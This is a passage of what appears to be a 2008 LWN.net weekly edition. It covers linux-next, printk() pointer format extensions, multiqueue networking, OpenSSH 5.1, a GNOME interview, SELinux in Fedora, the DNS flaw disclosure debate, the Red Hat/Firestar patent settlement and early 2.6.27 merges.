window.  Developers will be testing each other's trees as they work,
causing bugs to turn up earlier in the process.  And, of course, Andrew
won't have to complain about patches which fail to build for him - at
least, not as often.

Linux-next is a somewhat strange base on which to try to develop, though.
It is built anew every day from over 100 subsystem trees, each of which
can, itself, change from one day to the next.  So linux-next is a moving
target, just like the mainline is.  But, unlike the mainline, linux-next
has no consistent or coherent history.  Every day's linux-next tree is a
completely new creation with a unique - and transient - history.


Consider a developer who bases some work on a mainline release -
2.6.26-rc9, say.  That developer's work will be derived from a specific
commit in the mainline tree, known as
b7279469d66b55119784b8b9529c99c1955fe747 in this case.  The history from
2.6.26-rc9 is well defined, and that series of patches can be merged into
any other repository which also contains 2.6.26-rc9; the identity of that
commit is consistent and immutable across all repositories.  With such a
development tree, it is (relatively) easy to track the mainline as it
advances, and to merge one's work when the time comes.  A git tree based on
the mainline sits on a solid foundation.


It is not possible to base a tree on linux-next in the same way.
Development can begin at a specific commit, but tomorrow's linux-next tree
may not contain that commit at all.  The various component trees will have
advanced independently of the previous day's linux-next tree, which can, in
itself, complicate things.  But the process of making all those trees
come together can involve tasks like moving patches from one tree to another, or
fixing intermediate patches which break things.  That makes the end result
better, but at the cost of rebasing those trees.  Rebasing completely
rewrites the development history, causing the old history to disappear from
the tree.  So a patch series based on the previous history loses its
foundation. 


And, since linux-next is built from its components every day, a patch
developed on top of linux-next may, when integrated into that tree, be
merged somewhere in the middle of the sequence; in other words, the patch
will be merged into a tree which differs considerably from the tree on
which it was developed.  As Stephen Rothwell, the maintainer of the
linux-next tree, put it:


	One downsides of the way linux-next works is that, because it is
	recreated every day, you cannot really base anything on it that is
	to be merged into it.


Another interesting aspect of linux-next development involves API changes.
The longstanding rule in kernel development is that internal kernel
interfaces can be changed if there is a good reason to do so, but that the
person making the change is obligated to fix all in-tree code broken by
that change.  If an API change is introduced into linux-next, though, the
developer is simply not able to fix any code which enters linux-next by way
of the other subsystem trees.  If the developer does get patches into those
trees for the API
change, they can no longer be built on top of kernels which lack that change -
the mainline, for example.  API changes have, in other words, become
harder to do - a situation which some may see as a good thing.

What all this means is that API changes must be handled through techniques
like the creation of backward-compatibility layers; those layers can then
be removed a development cycle or two later once the transition is
complete.  Or changes can be split up and added to individual subsystem
trees; that, however, can lead to interesting ordering dependencies between
the trees.  In some cases, we are seeing 2.6.27 changes being merged into 2.6.26 in stub form as a way
of making all of the pieces fit together.

Then, there is the simple matter that developers like to have a stable base
upon which to create their code.  The linux-next tree, since it contains
large amounts of relatively new code, will also contain its share of new
bugs.  That makes developers, who are often having enough trouble just
tracking down their own bugs, somewhat grumpy.  Development against the
mainline tends to have a lower probability of forcing developers to look
for bugs which are not of their own making.

Many of these complaints have an easy answer: the pain which comes from
making all the pieces fit together in linux-next must be faced at some
point anyway.  The real difference is that linux-next allows those problems
to be dealt with at leisure, while the older "merge everything in the
mainline" model compressed much of that work into the merge window.  How
beneficial that really is will be seen for the first time in the 2.6.27
merge window; if linux-next is serving its intended function, 2.6.27 should
come together with rather less hassle than its immediate predecessors did.


But, regardless of the value provided by linux-next for integration and
testing purposes, the fact remains that it is a difficult platform upon
which to develop patches.  That process is somewhat like building a house
on a sand bar; overnight the tide comes in and completely reshapes the land
underneath you.  That is why most (possibly all) of the subsystem trees
used to assemble linux-next are, themselves, based on the mainline.


The solution to that problem will have to evolve over time.  The linux-next
tree is a new institution which is still finding its proper place in the
development process.  Easier ways to develop patches against the linux-next
tree will certainly be worked out; it may well turn out that quilt-like 
tools work better for this task than git.  But, for now, linux-next is an
excellent integration and testing resource, but it has not quite yet
managed to become the true Linux kernel development tree.

		Enhanced printk() merged


A change very late in the development cycle for 2.6.26 provides a framework
for extending printk() to handle new kinds of arguments.  Linus
Torvalds just merged the change—after -rc9—presumably
partially because he knew he could trust the author, but also because it
should have no
effect on the kernel.  It will provide for better debugging output once
code is changed to take advantage of it.


The core idea is to extend printk() so that kernel data structures
can be formatted in kernel-specific ways.  In order to get some
compile-time checking, 
the %p format specifier has been overloaded. 
For example, %pI might be used to indicate that the associated
pointer is to be formatted as a struct inode, which could print
the most interesting fields of that structure.  GCC will be able to check
for the presence of a pointer argument, but because it does not understand
the I part, cannot enforce that it is a pointer of the right type. 


Extending printk() in this manner allowed Torvalds—who
authored the patch—to
add two new 
types to printk(): %pS for symbolic pointers and
%pF for symbolic function pointers.  In both cases, the code uses
kallsyms to turn the pointer value into a symbol name.  Instead of
a kernel developer having to read long address strings and then trying to
find them in the system map, the kernel will do that work for them.


The %pF specifier is for architectures like ppc and ia64 that use
function descriptors rather than pointers.  For those architectures, a function
pointer points to a structure that contains the actual function address.
By using the %pF specifier, the proper dereferencing is done.


As an example of how the augmented printk() could be used,
Torvalds converted
printk_address().  The
CONFIG_KALLSYMS dependency and the kallsyms_lookup() were
removed, essentially leaving a one-line function:

If kallsyms is not present, the new printk() just reverts
to printing the address in hexadecimal, which allows the special case
handling to be done there.


The clear intent is to allow additional extensions to printk() to
support other kernel data structures.  The change to
vsprintf(), which underlies printk(), actually allows for
any sequence of alphanumeric characters to appear after the %p.
The new pointer() helper function currently only implements the
two new specifiers, but others have been mentioned.  


The mostly likely additions are for things like IPv4, IPv6, and MAC
addresses.  Torvalds specifically mentions
using %p6N as a possibility for IPv6 addresses.  Some would rather
have seen a different syntax be used, %p{feature} was suggested, but that would conflict with some
current uses of %p in the kernel.  Torvalds is happy with his choice:

I _expressly_ chose '%p[alphanumeric]*' because it's basically
totally insane to have that in a *real* printk() string: the end result
would be totally unreadable.


The patch took an interesting route to the kernel, with much of the
discussion evidently going on in private between Torvalds, Andrew Morton,
and others before popping up on the linuxppc-dev and linux-ia64 mailing
lists.  The patch itself has not been posted to linux-kernel in its
complete form, but was
committed on July 6.  While it is a bit strange to see such a change this
late in the development cycle, it is a change that should have no impact as
there are no
plans to actually use the new specifiers in 2.6.26.


		Multiqueue networking


One of the fundamental data structures in the networking subsystem is the
transmit queue associated with each device.  

The core networking code will call a driver's
hard_start_xmit() function to let the driver know that a packet is
ready for transmission; it is then the
driver's job to feed that packet into the hardware's transmit queue.
The result is a data structure which looks vaguely like this:


"Vaguely" because the list of sk_buff structures (SKBs - the
internal representation of packets) does not exist in this form within the
kernel; instead, the driver maintains the queue in a way that the hardware
can process it.

This is a scheme which has worked well for years, but it has run into a
fundamental limitation: it does not map well to devices which have multiple
transmit queues.  Such devices are becoming increasingly common, especially
in the wireless networking area.  Devices which implement the Wireless
Multimedia Extensions, for example, can have four different classes of
service: video, voice, best-effort, and background.  Video and voice
traffic may receive higher priority within the device - it is
transmitted first - and the device can also take more of the available air
time for such packets.  On the other hand, the queues for this kind of traffic may
be relatively short; if a video packet doesn't get sent on its way quickly,
the receiving end will lose interest and move on.  So it might be better to just
drop video packets which have been delayed for too long.  


On the other hand, the "background" level only gets transmitted if there is
nothing else to do; it is well-suited to low-priority traffic like bittorrent
or email from the boss.  It would make sense to have a
relatively long queue for background packets, though, to be able to take
full advantage of a lull in higher-priority traffic.


Within these devices, each class of service has its own transmit queue.
This separation of traffic makes it easy for the hardware to choose which
packet to transmit next.  It also allows independent limits on the size of
each queue; there is no point in filling the device's queue space with
background traffic which is not going to be transmitted in any case.  But
the networking subsystem does not have any built-in support for multiqueue
devices.  This hardware has been driven using a number of creative
techniques which have gotten the job done, but not in an optimal way.  That
may be about to change, though, with the advent of David Miller's multiqueue transmit patch
series. 


The current code treats a network device as the fundamental unit which is
managed by the outgoing packet scheduler.  David's patches change that
idea somewhat, since each transmit queue will need to be scheduled
independently.  So there is a new netdev_queue structure which
encapsulates all of the information about a single transmit queue, and
which is protected by its own lock.  Multiqueue drivers then set up an
array of these structures.  So the new data structure can, with sufficient
imagination, be seen to look something like this:


Once again, the actual lists of outgoing packets normally exist in the form
of special data structures in device-accessible memory.  Once the device
has these queues set up for it, the various policies associated with each
class of service can be implemented.  Each queue is managed independently,
so more voice packets can be queued even if some other queue (background,
say) is overflowing.

David would appear to have worked hard to avoid creating trouble for
network driver developers.  Drivers for single-queue devices need not be
changed at all, and the addition of multiqueue support is relatively
straightforward.  The first step is to replace the
alloc_etherdev() call with a call to:


The new queue_count parameter describes the maximum number of
transmit queues that the device might support.  The actual number in use
should be stored in the real_num_tx_queues field of the
net_device structure.  Note that this value can only be changed
when the device is down.

A multiqueue driver will get packets destined for any queue via the usual
hard_start_xmit() function.  To determine which queue to use, the
driver should call:


The return value is an index into the array of transmit queues.  One might
well wonder how the networking core decides which queue to use in the first
place.  That is handled via a new net_device callback:


The patch set includes an implementation of select_queue() which
can be used with WME-capable devices.

About the only other required change is for multiqueue drivers to inform
the networking core about the status of specific queues.  To that end,
there is a new set of functions:


A call to netdev_get_tx_queue() will turn a queue index into the
struct netdev_queue pointer required by the other functions, which
can be used to stop and start the queue in the usual manner.  Should the
driver need to operate on all of the queues at once, there is a set of
helper functions:


Naturally, there are a few other details to deal with, and the multiqueue
interface is likely to evolve somewhat over time.  At one point, David was
hoping to have this feature ready for inclusion into 2.6.27, but that goal
looks overly ambitious now.  It does seem that much of the ground work will be merged in the
next development cycle, though, meaning that full multiqueue support should
be in good shape for merging in 2.6.28.

		What's coming in OpenSSH 5.1


OpenSSH is an important
tool for remote connectivity:
"OpenSSH is a FREE version of the SSH connectivity tools that technical users of the Internet rely on. Users of telnet, rlogin, and ftp may not realize that their password is transmitted across the Internet unencrypted, but it is. OpenSSH encrypts all traffic (including passwords) to effectively eliminate eavesdropping, connection hijacking, and other attacks. Additionally, OpenSSH provides secure tunneling capabilities and several authentication methods, and supports all SSH protocol versions."


On July 6, 2008 a 

call for testing was issued for OpenSSH version 5.1:
"OpenSSH 5.1 is almost ready for release, so we would appreciate testing
on as many platforms and systems as possible. This release is one of
the biggest in recent years, with two hackathons' worth of improvements
and fixes for some of our most recalcitrant bugs."

<!-- LWNPutAdHere -->

A large number of new features are being added to the OpenSSH suite
of utilities.  Some of the feature highlights include:

Experimental SSH fingerprint visualization
(see this paper [pdf]) will produce visual representations
of host keys for quick key validation.
 The sshd daemon will get a new extended test mode with
capabilities for dumping the configuration and testing match rules.
 A "df" command has been added to the sftp client for displaying
server filesystem information.
 There will be a new mechanism for disabling further session requests
between ssh and sshd.
 The ssh-keygen command will get a new -l option that will allow
searching for a host in the known_hosts file.
 ssh and sshd will better support port forward destination hosts
with multiple forward addresses.
 Some basic interoperability tests have been added for Twisted Conch.
 Configuration file changes:
 
Classless Inter-Domain Routing (CIDR) address/masklen matching will be added to sshd_config "Match
address" blocks and authorized_keys "from" restrictions.
  A new sshd_config AllowAgentForwarding option will control
authentication agent forwarding.
 The sshd_config MaxSessions option will give finer grained control
to the number of multiplexed sessions.
  sshd_config "Match group" blocks will get new support for group negation.
  sshd_config match blocks will now support the MaxAuthTries option.
 
Performance improvements.
 Documentation improvements.
 Bug fixes.


For those who would like to experiment with the new features,
a series of
snapshot releases
are available for download.


		Questions and answers with Stormy Peters


Those who have followed the GNOME project over the last few years have seen
the wishlist item for a "business manager" or "executive director" for the
GNOME Foundation; the subject was especially likely to come up during
Foundation board elections.  This position has remained unfilled for some
time, seemingly a result of uncertain funding and the difficulty of finding
the right person.  These problems would appear to be in the past now; on
July 7, the GNOME Foundation announced
that this position would be filled by Stormy Peters, formerly of OpenLogic.


Stormy now has the challenge of helping an energetic and independent-minded
development community build on its success and achieve its ambitious goals
for the future.  We asked her a few questions about how she thought that
might go; here's what we got back. 

LWN: This is a new position, in that the GNOME Foundation has never had an
   executive director before.  So people may be wondering what you'll
   actually be doing.  How do you expect to be spending your time in this
   position?  


	Actually, the GNOME Foundation has had an executive director before
	but not for the past few years. I will spend my time strengthening
	relationships with the existing sponsors, working on finding new
	industry partners and helping the Board of Directors and the
	community execute some of their great ideas for GNOME. The GNOME
	community's goal is to provide an easy to use, intuitive interface
	for Linux and Unix as well as a powerful development platform.


A year from now, what do you hope your biggest accomplishments will be?


	The GNOME community has a tremendous amount of passion and a real
	dedication to making a development platform and a desktop that is
	easy to use. I think showing the world that, getting the word out
	and showing how it is changing the way people are able use their
	computers and mobile devices is key.  So to answer your question,
	I'd like to see a stronger Foundation (more sponsors and members),
	increase the amount of great ideas that get executed, and make
	GNOME a household name. :)


Next year, it seems reasonably likely that there will be a combined
GNOME/KDE developers conference in Europe.  What are your thoughts on the
current state of cooperation with KDE, and how do you think it could be
improved?


	I hope we have a combined GUADEC/Akademy next year. KDE and GNOME
	have been working more closely together during the past year or so
	and they have accomplished some good things like with dbus. I think
	anytime you get great developers together, good things happen.


One high-profile GNOME goal was 10x10 - 10% of the desktop market by 2010.
In mid-2008, it seems fairly clear that this goal will not be achieved.  Do
you think that the desktop remains a suitable target for free software, or
should GNOME deemphasize the traditional desktop in favor of other goals?


	I do think that a free and open source desktop is still a great
	goal. While the number of free and open source desktops out there
	might be small, it is growing tremendously. Just look at the number
	of laptops that ship with GNU/Linux (from Dell, Asus and other) as
	well as the number of mobile devices that are based on free and
	open source software.


Though the GNOME Foundation is not intended to control the technical
direction of the project, it clearly cannot be without influence there.
Are there technical directions you would like to see the development
community take, directions which would help to convince manufacturers to
incorporate GNOME technologies and contribute to GNOME development?


	I'll be working closely with the community and the board of
	advisors to figure out how I can best help with technical
	directions. One thing we'd like to see from our sponsors - through
	our board of advisors - is more information on what end-users would
	like to see in GNOME.


In the past you have spoken about how introducing money into free software
development can have a demotivating effect on developers.  Do you fear that
sort of problem as GNOME becomes more commercially successful?  How would
you hope to avoid that kind of difficulty?


	I don't think it's an issue in the short term as growing the GNOME
	Foundation doesn't directly correspond to hiring lots of
	developers. But that said, I think the key is maintaining the
	intrinsic motivations that make GNOME contributors such a
	passionate group of developers.


Thanks to Stormy for being kind enough to answer our questions in the
middle of what must have been a highly busy time at GUADEC in Istanbul.

		SELinux and Fedora


Red Hat has undoubtedly done more to make SELinux usable than any other
organization, but has it actually reached the point where it can be enabled
by default for all desktops?  The Fedora project clearly thinks so.  Not only
is SELinux enabled, but the installer no longer has an option to disable
it or to put it into "permissive" mode.  Most of the posts in a thread on
the fedora-devel mailing
list see that as the right choice, but some are not so sure.  


Jon Masters started things off by making a request to restore the 
installation option, giving several reasons summing up with:

But there are numerous other justifications I could give, including my
personal belief that it's absolutely nuts to thrust SE Linux upon
unsuspecting Desktop users (who don't know what it is anyway) without
giving them the choice to turn it off.


His reasons were unconvincing to many as he was not considered to be a
"normal" desktop user; the things he was doing were much more technical
than the users that are being targeted by the SELinux policies distributed
with Fedora 9.  The problems he reported were resolved quickly, but the
fact remains that there are paths through Fedora—even just using
desktop applications—that will result in SELinux-caused failures.
The Red Hat SELinux team is very responsive, but users will get frustrated
quickly if things they are trying to do fail in mysterious (to them) ways.


Alan Cox argues against providing an installation choice because he doesn't
think users have enough context to make a sensible choice.  He likens it to a
car with multiple choices for safety features:

"This car has brakes, enable them ?"
"Would you like the seatbelts to work ?"
"Shall I enable the airbag ?"


When push comes to shove, Masters and a few others see the default of
SELinux installed in "enforcing" mode as being too restrictive.  It is
likely to cause users to become annoyed with Fedora as a whole because one
or more paths through the applications have not yet been tested.  That,
unfortunately, is the crux of the issue: SELinux policies are being
developed in a reactive manner based on testing applications and adding
exceptions for actions they perform.


As a security tool, SELinux is a good choice, because it essentially denies
everything by default.  Policies are added that will allow certain actions
for users and applications.  Its complexity is legendary, however, which is why
Red Hat (and others) have made a substantial effort to make it work
semi-invisibly.  They started by generating policies for network-facing
services and have now moved into securing desktop applications,
particularly programs like web browsers which are increasingly the target
of attacks.


SELinux has three modes, disabled, which turns off SELinux,
permissive, which just logs attempts to do things that violate the
policies, and 
enforcing, which disallows any access that is denied by the policies.
When getting applications to work with SELinux, permissive mode is typically
used. The log messages are analyzed to determine what changes should be
made to the policies or to the application so that they work
together.  If there are features that were not tested in the application that
require additional privileges, the first user that tries that feature in
enforcing mode will run into trouble.


When that happens, SELinux can be put into permissive mode with a simple
GUI or configuration file change, followed by a reboot.  One of the
problems is that users may very well not know that SELinux is the source of
their problem.  There are tools, like SETroubleShoot, that can help alert users, but it is still a
frustrating, hard to comprehend problem at times.  Once the user has
"fixed" the problem by disabling SELinux, they are unlikely to turn it back
on. 


It is a difficult choice, but Fedora is firmly on the side of forcing
non-technical users into using SELinux, at least until it breaks.  More
technical users will know about SELinux and, perhaps, be able to make more
informed choices.
One of Red Hat's SELinux developers, James Morris, neatly  sums up the reasons it is important to
continue pushing SELinux:

The only way to really make progress in improving security is to make it a
standard part of the computing landscape; for it to be ubiquitous and
generalized, which is the aim of the SELinux project.

[...]
Punting the decision to the end user during installation is possibly the
worst option.  It's our responsibility as the developers of the OS to both
get security right and make it usable.  It's difficult, indeed, but not
impossible.


There are efforts underway to add easier ways for users to report SELinux
log messages, perhaps even in an automated way, so that policy or
application problems get identified and fixed more quickly.  While it may
not be easy for long-time Linux users to adjust to an SELinux-enabled
system, it is getting to the point where average users, who never use
the command line, rarely run into problems.  And those are just the kind of
users who need the level of security that SELinux can provide.


		Fedora takes Linux to college


The idea of Linux in the classroom is nothing new. From a grassroots push for district-wide adoption in secondary schools, to a plan to offer the One Laptop Per Child program in every developing country, the FOSS community is always looking for ways to encourage schools to use Linux. Recently, however, there's a new movement afoot that's aimed at snapping up a segment of computer users before they spend their money on computers with commercial operating systems. Linux is headed to college.

For the last few weeks, volunteer members of Fedora's marketing team have been kicking around ideas on ways to encourage college students to give Linux a try and draw new users into the Fedora fold. Rather than approach university IT departments running Windows to convince them to switch operating systems, the team hopes to create a groundswell of college-aged users who will march into classrooms and lecture halls with Fedora-laden laptops and eagerly dive into work-study projects that focus on Linux development.

Jack Aboutboul, Red Hat's Community Engineer and the main impetus behind the tentatively-named Campus Ambassador program, says though it is similar to Fedora's existing Ambassador program, the new program will have a different governance model and slightly different goals. Students from Auburn, Texas A&amp;M, Berkeley, and other U.S. colleges, as well as team members attending universities in other countries, have already shown an interest in assuming the role of Campus Ambassadors, and have agreed to speak at campus events about the benefits of Fedora and of Linux in general.

Taking the idea a step further, many Fedora team members would like to see the development of promotional material designed with college students in mind, such as posters that encourage students in the art department to volunteer their skills creating artwork for Linux distros. As one Fedora marketing team member notes, "How many marketing majors are aware that there are real life marketing opportunities for them within the Fedora project while they are still students? Reaching these students should be one focus of any campus outreach."

At least one school, Cabrillo College in Santa Cruz County, California, is already hard at work promoting Fedora on its campus. In addition to forming a GNU/Linux Users Group (LUG) and holding regular installfests, the LUG is also creating its own Fedora-based distro called Seahawk GNU/Linux, named after the school mascot. LUG President  Larry Cafiero explains, "Not that the world needs yet another distro, mind you, but we're using the project as a teaching tool more than an actual distro that will take the world by storm." He says that not only do students gain hands-on familiarity with Linux, but "those who get introduced to GNU/Linux through the school-based distro get a sort of introduction to Fedora as well."

Since Fedora already has a strong Ambassador Program, the question of why a separate university Ambassadorship is necessary has come up. Essentially, it boils down to a difference in how users will be mentored. In the typical Ambassador arrangement, Fedora users simply evangelize Linux and encourage people to give Fedora a try while offering assistance and tips along the way. Marketing team member Chris Tyler sees the role of Campus Ambassador as more finely-tuned and as a "a matchmaker between a student, a potential need (project), and community resources." Tyler says that there are many benefits to this arrangement, including the opportunity for students to work on projects with a larger user base which, will therefore have a bigger real-world impact than student projects that remain inside the walls of the school.

Team member Jeff Spaleta says finding projects with a long shelf life is vital to keeping students interested in Linux, and good for the long-term health of the community. "If students as part of their degrees need to work on a year or semester-long project, I want Fedora to be obvious place to look for compelling things to work on, with an aim towards well scoped projects that have a good chance for long lived utility," he says. "I hate seeing good academic projects die because there was no real plan to hand them off outside of that academic group which incubated them."

Team members seem to be in agreement that the Ambassador program is a winning situation for everyone. Students get hands-on experience — and, in some cases, a grade — for participating in a software development project. Computer technology departments can offer a wider learning environment with little to no investment, Fedora may garner new users, and the Linux community as a whole grows. 

In an effort to move the Campus Ambassador project forward, Jack Aboutboul plans to formally present the idea at a Community Architecture meeting later this month.

		Secrecy and the DNS flaw


By now, most folks will have seen reports of the design flaw discovered in DNS as
it has seen fairly widespread coverage, even in the non-technical press.
It is rare to see such a coordinated disclosure and security update amongst
that many of the big players in the computer industry.  While fixes abound,
the actual problem has yet to be disclosed, which has both positives and
negatives. 


Responsible disclosure policies dictate that vulnerabilities be kept secret
until all affected vendors can create an update.  Because this flaw is in
the design of DNS, most implementations were affected.  This still doesn't
quite explain the roughly six months between the discovery of the problem
and the release of the fix.  Evidently it took a meeting of the minds at
the Microsoft campus in March to decide upon the right course of action.
Once the fixes were done, presumably they were released on the next "patch
Tuesday"—Microsoft's monthly security update day.


Normally, once fixes are available, information about the vulnerability is
released.  But, for a number of reasons, that has not happened in this
case.  One of the main reasons is that DNS is an essential internet service
and it will take time for affected users to patch their systems.  In
addition, there have been no reports of this flaw being exploited "in the
wild", reducing the pressure to divulge it.


Security researcher Dan Kaminsky discovered the flaw and he has yet another, "blatantly selfish"
reason for keeping it quiet as he would like to be able to announce it at Black Hat in Las Vegas in early August:

While I'm out there, trying to get all these bugs scrubbed — old and
new — 
please, keep the speculation off the @public forums and IRC channels. We're
a curious lot, and we want to know how things break. But the public needs
at least a chance to deploy this fix, and from a blatantly selfish
perspective, I'd kind of like my thunder not to be completely stolen in
Vegas.


None of these seem like horrible reasons to keep the vulnerability quiet
for a time (roughly 30 days), but they do leave some DNS implementations
and worried administrators without the information they need to evaluate
the situation.  Administrators do not know what traffic patterns or
other symptoms to look for to determine if exploits are being attempted.
Smaller, less prominent DNS implementations were not included in the
collaboration, thus they don't have enough information to decide whether
they are vulnerable or not. 


A perfect example is Dnsmasq, a
lightweight DNS server for smaller networks.  Dnsmasq is often used in
embedded Linux distributions targeted for home wireless routers.  Simon
Kelley, Dnsmasq developer, was asked about the vulnerability; his response
speaks volumes:

I wasn't contacted in advance about this, and no patch for dnsmasq has
been released. Since the exact nature of the new vulnerability has not
(as far as I know) been announced, I don't know if dnsmasq is vulnerable.


Kelley has since released
a patched version, but it is still unknown whether it is needed or,
really, if it even fixes the problem.  It is difficult to know for sure that
a security hole has been closed if information about the hole is not
available.  This points to the problems that can come from withholding
vulnerability information. 


Based on the patches and some information from Kaminsky and others, it is
clear that this is a cache
poisoning vulnerability.  Since source port randomization is the change
that was applied to alleviate, but not eliminate, the flaw, we can surmise
that Kaminsky found a way to reduce the number of spoofed replies that need
to be sent to something tractable.  According Internet Systems Consortium,
developers of the BIND DNS server, the only true solution is DNSSEC, which implies that
the current fixes only make cache poisoning less likely, not impossible.


Source port randomization is a technique that has been advocated by Daniel
J. Bernstein (i.e. djb) for many years.  He implemented it in his djbdns name server long ago.
Essentially, it chooses a random source UDP port for each query that the
name server makes, which has the effect of increasing the randomness that
an attacker needs to be able to predict before being able to poison the
cache.


While the market share of Dnsmasq may be miniscule, there are certainly
other DNS implementations that are also concerned.  In addition, we are
relying on those 
who are "in the know" to be on the lookout for suspicious traffic that
might indicate the vulnerability being exploited.  Kaminsky is certainly
under no obligation to reveal anything, but one wonders if the safest
course would have been for him to provide details now, even at the expense
of his "thunder".


		What Red Hat and Firestar agreed to


On July 15, Red Hat and Firestar released
the terms of the settlement [PDF] of
their patent suit.  When we last
looked at this settlement, those terms were not available.  Now we can
examine exactly what was agreed to and assess the degree of protection that
Red Hat actually negotiated for the wider community.  It may be tempting to
say that recent events have reduced the relevance of this settlement, but
that would be a mistake; what Red Hat has done here still matters.


Those recent events, of course, are dominated by Sun's announcement that it
had successfully challenged the Firestar patent; the US Patent and Trade
Office (PTO) has officially rejected all of Firestar's claims.  As your editor
(along with numerous others) has said, this should not have been a
particularly hard thing to do; the weakness of this particular patent was
evident after even a cursory reading.  So one might well wonder why Red Hat
chose to pay the troll in this particular case.


And, incidentally, Red Hat did pay.  Naturally enough, the specific payment
terms have been removed from the agreement, but a payment was a part of the
deal.


It is nice that Sun took a less compromising approach to this case, even
though it was not named as a defendant.  But Sun's success has not rendered
this settlement moot, for a few reasons.  To begin with, Firestar now has
two months to fight the PTO decision and reinstate its patent.  That looks
like a difficult task, but, with the PTO, one never really knows.  Second,
the settlement does not cover just that one patent; it covers just about
any patent that Firestar owns or will acquire in the next five years -
though some of that coverage goes away in 2013.  And, perhaps most
importantly, Red Hat clearly sees this settlement as a template for the
resolution of other patent suits which are certain to come in the future.


The settlement itself reads somewhat like a Pascal program; one must start
toward the bottom and read it in reverse.  Following that analogy, the main
program can be found in section 5.2:


	Licensor grants and promises to grant to Red Hat Community Members
	a perpetual, fully paid-up, royalty-free, irrevocable worldwide
	license of the Licensed Patents to engage in any and all activities
	related to Red Hat licensed Products, including without limitation
	to make, have made, use, have used, sell, have sold, offer for
	sale, have offered for sale, provide or have provided, distribute
	or have distributed, import or have imported and Red Hat Licensed
	Product and services related to any Red Hat Licensed Product.


So, these patents have been licensed for any practical purpose to anybody
who happens to be a Red Hat Community Member, as long as they are working
with Red Hat Licensed Software.  Well, almost any purpose; there is a small
catch, as will be seen shortly.  First, though, it is time to read the
declarations 
toward the top of the settlement to see what those terms really mean.  Who,
exactly, is a Red Hat Community Member?


	...any Entity that is a licensee or licensor of, contributes to,
	develops, authors, provides, distributes, receives, makes, uses,
	sells, offers for sale, or imports, in whole or in part, directly
	or indirectly, any Red Hat Licensed Product, including without
	limitation any upstream contributor to, or downstream user or
	distributor of, a Red Hat Licensed Product.


This definition is clearly quite comprehensive; anybody who makes use of
the software is considered to be a Red Hat Community Member.  Your editor
is pondering offering for sale a line of "Proud Red Hat Community Member"
T-Shirts at the next Debconf or OpenBSD hackfest.  This is a club that we
all get to join.

The other key term, though, is "Red Hat Licensed Product," because only
such products are covered by the settlement.  The definition of this
product is simple:


	"Red Hat Licensed Product" means any Red Hat Product, Red Hat
	Derivative Product, or Red Hat Combination Product.


Now, perhaps, we have moved away from Pascal programming and are stuck with
the unenviable task of making sense of a convoluted Java class hierarchy.
One of the subclasses, the definition of "Red Hat Product," is crucial:


	...(a) any product, process, service, or code developed by,
	licensed by, authored by, distributed under a Red Hat Brand by,
	made by, sold under a Red Hat Brand by, offered for sale under a
	Red Hat Brand by, sponsored by, or maintained by Red Hat, (b) any
	predecessor version of any of the foregoing, including without
	limitation any upstream predecessor version any of the foregoing...


So essentially, a Red Hat Product is anything developed or shipped by Red
Hat under one of its trade names.  So anything in Red Hat Enterprise Linux
qualifies.  The important thing that Red Hat didn't see fit to specify in
its early PR is that anything in Fedora - also being software distributed
under a Red Hat Brand -  qualifies too.  Since Fedora
packages rather more software than RHEL does, that broadens the coverage of
this agreement considerably.

Also important is the "any predecessor version" clause.  Coverage under
this agreement does not apply to just the specific, possibly patched
version of a program shipped by Red Hat; anything which came before in that
package's upstream is also part of the deal.  And, incidentally, this
coverage does not go away if Red Hat stops shipping a package; just one
shipped version will do.  The Red Hat Brand has become the magic touch
which confers protection against Firestar patents onto any software it
touches. 

Thus far, we have coverage for Red Hat's packages and their predecessors
upstream.  What happens, though, if the upstream project continues to
develop the software beyond the version shipped by Red Hat?  That's where
the "Red Hat Derivative Product" category comes in:


	"Red Hat Derivative Product" means any product, process, service,
	or code that is a direct or indirect Derivative of at least one Red
	Hat Product.


So the combination of "any predecessor version" and the definition of a
Derivative Product means that the entire project is covered, from its first
version through anything it will do in the future - though, once again,
there's a catch.  But, before we get to that, there is the third subclass:
"Red Hat Combination Product."  It refers to a grouping of something which
is one of the two product types described above and something unrelated -
an aggregation.  The apparent intent is to cover situations like dynamic
linking: an application which links to a covered library will, itself, be
covered.

These definitions, too, appear to be quite broad.  Just about
anything which has been shipped by Red Hat, or which has even shared the
same disk drive as something shipped by Red Hat qualifies.  But, as has
been mentioned before, there is one catch in the form of an excluded class
of software:


	a Red Hat Derivative Product that infringes the particular Licensed
	Patent at issue without use of or reference to any portion or
	functionality in or from a Red Hat Product on which the Red Hat
	Derivative Product is based.


(There is similar language for Combination Products as well).  What this
section is saying is that, if a derived product contains infringing code,
that infringing code must have been part of the covered Red Hat product as
well.  In other words, outsiders cannot bless their particular patent
infringement by grabbing enough code from some other project to create a
derived product.  One can see why this restriction was seen to be
necessary; without it, any software (free or proprietary) could have easily
been brought under the coverage umbrella.  Instead, one must first convince
Red Hat to distribute that software at least once.


Plenty of other legalese can be found in the agreement, of course;
interested readers are encourage to read the whole thing.  But the core of
it is what's described above.  Notably absent (unless it has been redacted
from the payment section, which seems unlikely) is any discussion of what
happens if the patent is held to be invalid.  So, even if Sun is ultimately
successful in its challenge (as seems likely), Red Hat will not be getting
its money back under the terms of this agreement.


Red Hat's initial press release claimed that this settlement demonstrated
the company's commitment to standing up for the community in the face of
patent trolls, and stated that it would discourage any future such cases.
At this point it seems fairly evident that Sun has made a better show of
standing up for the community and discouraging future cases.  What Red Hat
has done, though, is to show us how future patent problems could be
resolved in the absence of obvious prior art.  If one must pay the troll,
one would do well to come out with an agreement like this one and, at
least, keep the troll away from the rest of the community.  Whether patent
holders who actually have a legal leg to stand on will be willing to agree
to such a settlement remains to be seen; the nature of the game is such
that, unfortunately, we are likely to get an answer to that question sooner
or later.

		2.6.27: what's coming (part 1)


Linus wasted no time after the 2.6.26 release; he opened the 2.6.27 merge
window less than 24 hours later.  As of this writing, the process has
barely begun with a mere 3000 changesets merged.  So we do not have a
complete picture of what will be in the next kernel release.  But we can
look at what has been merged so far.

User-visible changes include:


 New drivers for CompuLab EM-x270 audio devices (as found on the 
     Toshiba e800 PDA), 
     Philips UDA1380 codecs,
     Wolfson Micro WM8510 and WM8990 codecs,
     Atmel AT32 audio devices,
     AK4535 codecs,
     SGI HAL2 audio devices (as found in Indy and Indigo2 workstations),
     SGI O2 audio boards,
     crypto engines found in Intel IXP4xx processors,
     Freescale Security Engine processors,
     AMD I/O memory management units,
     Marvell Loki (88RC8480), Kirkwood (88F6000), and Discovery Duo
     (MV78xx0) system-on-chip processors, 
     IBM Power Virtual Fibre Channel Adapters, and
     GEFanuc C2K cPCI single-board computers.


